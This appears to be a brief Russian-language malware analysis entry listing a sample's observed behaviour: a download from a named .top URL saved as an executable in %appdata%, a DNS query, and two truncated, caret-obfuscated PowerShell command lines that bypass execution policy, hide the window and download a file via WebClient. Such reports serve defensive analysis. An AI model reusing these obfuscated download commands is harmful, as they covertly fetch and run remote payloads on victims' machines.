Техническая информация
- http://trendsnonstop.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeR^shE^lL.EX^e -^eXEcutIoNP^o^liC^Y ^bYpa^Ss ^-N^Opr^o^F^Ile^ -^wINd^Ow^s^T^YLE^ H^idd^EN^ ^(N^E^W^-o^BJ^e^ct^ ^s^YS^tE^m.NE^t^.w^e^B^CLIe^nT^).do^w^nl^o^a^DFIle(^'http:/...
- DNS ASK tr####nonstop.top
- '<SYSTEM32>\cmd.exe' /c "POWeR^shE^lL.EX^e -^eXEcutIoNP^o^liC^Y ^bYpa^Ss ^-N^Opr^o^F^Ile^ -^wINd^Ow^s^T^YLE^ H^idd^EN^ ^(N^E^W^-o^BJ^e^ct^ ^s^YS^tE^m.NE^t^.w^e^B^CLIe^nT^).do^w^nl^o^a^DFIle(^'http:/...' (со скрытым окном)